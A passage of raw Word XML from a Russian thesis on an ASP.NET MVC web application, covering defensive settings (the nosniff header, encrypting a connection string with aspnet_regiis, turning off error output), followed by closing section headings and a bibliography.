      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nosniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3376">
        <w:rPr>
          <w:rStyle w:val="23"/>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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>appsettings.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">но строку нужно хранить не в открытом виде, а в зашифрованном. Это можно сделать с помощью утилиты </w:t>
      </w:r>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>aspnet_regiis.exe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>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Pr="00295BB1" w:rsidRDefault="00434B16" w:rsidP="00EF3376">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aspnet_regiis</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connectionStrings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  C</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\inetpub\wwwroot\YourAppName</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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уязвимостей сайта. Отключить вывод ошибок можно добавлением строки кода в файл конфигурации:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00965368" w14:textId="36A62C2A" w:rsidR="00C368DE" w:rsidRPr="00295BB1" w:rsidRDefault="00C368DE" w:rsidP="00434B16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>customErrors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="atn"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="atv"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>"On"</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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F73005" w:rsidRDefault="0093378B" w:rsidP="00282062">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc162709244"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>5.2 Разработка документации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>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8" w:history="1">
        <w:r w:rsidRPr="00EF3376">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>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010B0669" w:rsidR="003F0EAF" w:rsidRPr="003F0EAF" w:rsidRDefault="00F73005" w:rsidP="003F0EAF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidR="003F0EAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidR="003F0EAF">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F0EAF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F0EAF" w:rsidRPr="003F0EAF">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003F0EAF">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799E0DBD" w14:textId="77777777" w:rsidR="008F392E" w:rsidRDefault="008F392E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc161568218"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC7FBB0" w14:textId="241FF8F1" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="002A0DC9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc162709245"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6 Опытная и промышленная эксплуатация</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="0C0F627C" w14:textId="31D2E961"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CC2EBA">
        <w:t xml:space="preserve">Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Е</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4541F6D4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc122277553"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA6FD4F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00F73005" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc161568219"/>
      <w:bookmarkStart w:id="50" w:name="_Toc162709246"/>
      <w:r w:rsidRPr="00F73005">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ЗАКЛЮЧЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>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51" w:name="_Toc161568220"/>
      <w:bookmarkStart w:id="52" w:name="_Toc162709247"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="089A961B" w14:textId="77777777" w:rsidR="00E258B2" w:rsidRDefault="00E258B2" w:rsidP="00E258B2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Блохин Ю.И., Белов А.В., Блохина С.Ю. БЕСПРОВОДНАЯ ГИБРИДНАЯ СЕТЬ С ПОДДЕРЖКОЙ ИНТЕРНЕТА ВЕЩЕЙ (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IOT</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3376">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ДЛЯ МОНИТОРИНГА ПОСЕВСОВ СЕЛЬСКОХОЗЯЙСТВЕННЫХ КУЛЬТУР / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Биологизация</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> землепользования: почва, технологии, продукция. Материалы международной научно-практической конференции. Москва, 2023. С. 328-333.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58888DE8" w14:textId="02AAE374"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w:t>
      </w:r>
      <w:r w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> 5-288-03836-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17999E77" w14:textId="3A1BB512"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53FE58D7" w14:textId="2D585830" w:rsidR="00C625A2" w:rsidRPr="00C625A2" w:rsidRDefault="00C625A2" w:rsidP="00C625A2">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0" w:history="1">
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>function</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>x</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ru</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>statistics</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>dispersion</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>analysis</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>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1" w:history="1">
        <w:r w:rsidRPr="00C7756E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="000000"/>
            <w:u w:val="none"/>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3FA9BF8D"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E26603B" w14:textId="061F9CA4" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aniche</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> M. et al. Code smells for model-view-controller architectures //Empirical Software Engineering. – 2018. – </w:t>
      </w:r>
      <w:r>
        <w:t>Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. 23. – </w:t>
      </w:r>
      <w:r>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. 2121-2157.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9021E" w14:textId="4C3A840F" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Esbai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> R., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erramdani</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> M., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mbarki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> S. Model-driven transformation for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with approach by modeling: From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> model to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> web applications //International </w:t>
      </w:r>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Review on Computers and Software (I. RE. CO. S.). – 2014. – Т. 9. – №. 9. – С. 1612-1620.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE92364" w14:textId="35B96566" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Feldman S. A Conversation with Alan Kay: Big talk with the creator of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smalltalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-and much more //Queue. – 2004. – Т. 2. – №. 9. – С. 20-30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2473D013" w14:textId="1425CA24" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aydin S., Aydin M. N. Ontology-based data acquisition model development for agricultural open data platforms and implementation of OWL2MVC tool //Computers and Electronics in Agriculture. – 2020. – Т. 175. – С. 105589.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C89442" w14:textId="587EBFCC" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
